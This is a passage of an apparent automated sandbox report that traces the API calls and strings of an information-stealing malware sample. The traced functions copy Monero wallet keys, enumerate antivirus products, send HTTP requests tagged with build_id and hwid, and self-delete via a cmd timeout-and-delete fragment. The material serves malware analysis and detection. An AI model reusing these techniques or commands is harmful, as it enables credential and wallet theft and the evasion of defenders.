                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414191
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041420C
                                                                                • Sleep.KERNEL32(0000EA60), ref: 0041421B
                                                                                  • Part of subcall function 00413118: _EH_prolog.MSVCRT ref: 0041311D
                                                                                  • Part of subcall function 00413118: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041319F
                                                                                  • Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 004131B6
                                                                                  • Part of subcall function 00413118: StrStrA.SHLWAPI(00000000,00000000), ref: 004131DD
                                                                                  • Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 004131F2
                                                                                  • Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 0041320D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$lstrcpylstrlen$Sleep
                                                                                • String ID: *$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                • API String ID: 1345713276-3681523784
                                                                                • Opcode ID: 8d9ac18b8df2a6b284955ed97a086bcb1f821ef7b8b64bcd58f2fc5db10276e4
                                                                                • Instruction ID: 81b84598b74079d87ef3f85c7997e73a576bc14dc27035db183a239247f2f400
                                                                                • Opcode Fuzzy Hash: 8d9ac18b8df2a6b284955ed97a086bcb1f821ef7b8b64bcd58f2fc5db10276e4
                                                                                • Instruction Fuzzy Hash: D5626370904248EADB10EBE5C956BDEBBB89F19308F5041BEF445B32C1DB785B4C8B66

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00403AFA
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                  • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                  • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BA5
                                                                                • StrCmpCA.SHLWAPI(?), ref: 00403BBC
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00403D44
                                                                                • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00403D7E
                                                                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00403DA2
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,004259CD,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 0040407E
                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404097
                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004040A8
                                                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004040FC
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00404107
                                                                                • InternetCloseHandle.WININET(?), ref: 0040411C
                                                                                • InternetCloseHandle.WININET(?), ref: 00404125
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$lstrcpy$H_prologlstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                • String ID: !$"$"$------$------$------$build_id$hwid
                                                                                • API String ID: 1139859944-3346224549

                                                                                Control-flow Graph (function 00406737; graph image not reproduced)
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040673C
                                                                                  • Part of subcall function 0040FB28: StrCmpCA.SHLWAPI(?,?,?,00408A88,00425DD4,00000000), ref: 0040FB31
                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425BD0,?,?,?,00425BA6,?,00000000), ref: 004068A8
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00411056: _EH_prolog.MSVCRT ref: 0041105B
                                                                                  • Part of subcall function 00411056: memset.MSVCRT ref: 0041107D
                                                                                  • Part of subcall function 00411056: OpenProcess.KERNEL32(00001001,00000000,?,?,?,?,00000000,?), ref: 00411104
                                                                                  • Part of subcall function 00411056: TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000000,?), ref: 00411112
                                                                                  • Part of subcall function 00411056: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 00411119
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00406A9A
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00406AA1
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00406BBF
                                                                                • lstrcat.KERNEL32(00000000,00425BEC), ref: 00406BCD
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00406BDF
                                                                                • lstrcat.KERNEL32(00000000,00425BF0), ref: 00406BED
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00406D34
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00406D42
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                • memset.MSVCRT ref: 00406D9A
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 00406DBF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologlstrcat$lstrcpy$Processlstrlen$FileHeapmemset$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait
                                                                                • String ID:
                                                                                • API String ID: 4187064601-0
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040875E
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                  • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00425DC8,?,?,?,00425BEA,00000000), ref: 00408841
                                                                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004089AE
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 004089B5
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00408AD8
                                                                                • lstrcat.KERNEL32(00000000,00425DDC), ref: 00408AE6
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00408AF8
                                                                                • lstrcat.KERNEL32(00000000,00425DE0), ref: 00408B06
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00408C19
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00408C27
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                • memset.MSVCRT ref: 00408C7F
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 00408CA4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologlstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyCreateDeleteObjectProcessSingleSystemThreadTimeWaitmemset
                                                                                • String ID:
                                                                                • API String ID: 156379684-0
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00410781
                                                                                • CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory,00000000), ref: 00410799
                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 004107AA
                                                                                • CoCreateInstance.OLE32(00426FAC,00000000,00000001,00426EDC,?,?,00000000,?,?,?,?,?,?,00426624,00000000,?), ref: 004107C4
                                                                                • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000), ref: 004107FA
                                                                                • VariantInit.OLEAUT32(?), ref: 00410855
                                                                                  • Part of subcall function 004106C4: _EH_prolog.MSVCRT ref: 004106C9
                                                                                  • Part of subcall function 004106C4: CoCreateInstance.OLE32(00426D5C,00000000,00000001,00426488,?,00000001,00000000,00000000,00000001,?,00000000), ref: 004106F0
                                                                                  • Part of subcall function 004106C4: SysAllocString.OLEAUT32(?), ref: 004106FD
                                                                                  • Part of subcall function 004106C4: _wtoi64.MSVCRT ref: 00410738
                                                                                  • Part of subcall function 004106C4: SysFreeString.OLEAUT32(?), ref: 0041074B
                                                                                  • Part of subcall function 004106C4: SysFreeString.OLEAUT32(00000000), ref: 00410752
                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory,00000000), ref: 0041088D
                                                                                • GetProcessHeap.KERNEL32(?,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C), ref: 00410893
                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory), ref: 004108A0
                                                                                • VariantClear.OLEAUT32(?), ref: 004108E2
                                                                                • wsprintfA.USER32 ref: 004108CC
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: String$AllocCreateFreeH_prologHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                • API String ID: 2456697202-461178377
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004118B3
                                                                                • strtok_s.MSVCRT ref: 004118E4
                                                                                • StrCmpCA.SHLWAPI(?,true,?,?,00000104,?,00000104,?,?,00000000), ref: 0041197C
                                                                                  • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                  • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                • lstrcpy.KERNEL32(?,?), ref: 00411A33
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00411A6F
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00411AB6
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00411AFD
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00411B44
                                                                                • strtok_s.MSVCRT ref: 00411CA7
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: lstrcpy$strtok_s$H_prologlstrlen
                                                                                • String ID: false$true
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00404F2F
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                  • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                  • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                                • StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                                • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                                • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004050D2
                                                                                • InternetCloseHandle.WININET(00000000), ref: 004050DD
                                                                                • InternetCloseHandle.WININET(?), ref: 004050E6
                                                                                • InternetCloseHandle.WININET(?), ref: 004050EF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleHttp$H_prologOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                • String ID: ERROR$ERROR$GET
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004041B7
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                  • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                  • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004041FE
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00404205
                                                                                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404224
                                                                                • StrCmpCA.SHLWAPI(?), ref: 00404238
                                                                                • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040425C
                                                                                • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404292
                                                                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004042B6
                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004042C1
                                                                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 004042DF
                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404337
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00404369
                                                                                • InternetCloseHandle.WININET(?), ref: 00404372
                                                                                • InternetCloseHandle.WININET(?), ref: 0040437B
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleHttp$H_prologHeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                • String ID: GET
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004136E8
                                                                                • memset.MSVCRT ref: 00413708
                                                                                • memset.MSVCRT ref: 00413714
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 00413729
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 004138B5
                                                                                • memset.MSVCRT ref: 004138C2
                                                                                • memset.MSVCRT ref: 004138D0
                                                                                • ExitProcess.KERNEL32 ref: 004138E1
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: lstrcpymemset$H_prolog$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0041092A
                                                                                • CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000,?,00000000), ref: 00410942
                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000), ref: 00410953
                                                                                • CoCreateInstance.OLE32(00426FAC,00000000,00000001,00426EDC,?,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000,?), ref: 0041096D
                                                                                • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?), ref: 004109A3
                                                                                • VariantInit.OLEAUT32(?), ref: 004109F6
                                                                                  • Part of subcall function 00410C8D: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,00410A1D,?,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000), ref: 00410C95
                                                                                  • Part of subcall function 00410C8D: CharToOemW.USER32(?,00000000), ref: 00410CA1
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • VariantClear.OLEAUT32(?), ref: 00410A2B
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prologInitInstanceLocalProxySecuritylstrcpy
                                                                                • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00401C70
                                                                                • memset.MSVCRT ref: 00401C8E
                                                                                  • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                                  • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                                  • Part of subcall function 00401000: RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                                  • Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00401CB2
                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 00401CBF
                                                                                • lstrcat.KERNEL32(?,.keys), ref: 00401CDA
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                  • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                • CopyFileA.KERNEL32(?,00000000,00000001,00000000,?,00000000,?,00422360,?,?,?,0042234B,00000000,?,\Monero\wallet.keys,?), ref: 00401E04
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                  • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                  • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                  • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                  • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                  • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401E7F
                                                                                • memset.MSVCRT ref: 00401E9D
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmp
